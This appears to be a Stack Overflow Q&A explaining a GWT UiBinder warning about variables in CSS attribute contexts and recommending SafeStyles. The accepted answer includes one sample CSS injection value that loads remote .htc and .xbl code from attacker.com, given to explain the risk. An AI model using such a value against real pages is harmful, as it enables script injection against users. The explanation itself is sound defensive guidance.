# GWT "Template with variable in CSS attribute context" Warning is bad?

Tags: css, gwt, uibinder

Im using obfuscated styles eg.

```
    <ui:style>
        .explanation {
            text-align: center;
        }
    </ui:style>
...
    <g:HTMLPanel>
        <div class="{style.explanation}">
...
```

Is this bad practice?

It looks ok when I check the HTML, or perhaps I'm misunderstanding the warning..

Im getting the following warning in Development Mode with GWT :

```
Template with variable in CSS attribute context: 
The template code generator cannot guarantee HTML-safety of the template
 -- please inspect manually or use SafeStyles to specify arguments in a CSS attribute context
```

Answer (score 10, accepted):

`class` is not a "CSS attribute context", only `style` is (and `<style>`); so I doubt the warning comes from the code you showed (which is exactly how things are meant to be used, so not a bad practice at all).

The warning appears when you have things like `style='width: {foo}; height: {bar}'`, because there's no guarantee (at compile-time) that `foo` or `bar` won't contain something like `100%; behavior: url(http://attacker.com/injection.htc); -moz-binding: url(http://attacker.com/injection.xbl)`. In that case, you should rather use `style='{myStyle}'` where `myStyle` is an instance of `SafeStyles`.

Comment: Thanks I did a free text search in my uibinder for 'style=' but thinking about it the exception may be misleading and it may relate to one of the nested UIBinders.. I'll let y'all know how i get on

Comment: IIRC, there might be one such warning coming from GWT itself (in a Cell maybe)

Comment: Had this problem.  This was the answer.  Remove HTMLPanel / HTML everything from your ui.xml and you'll probably see what's wrong.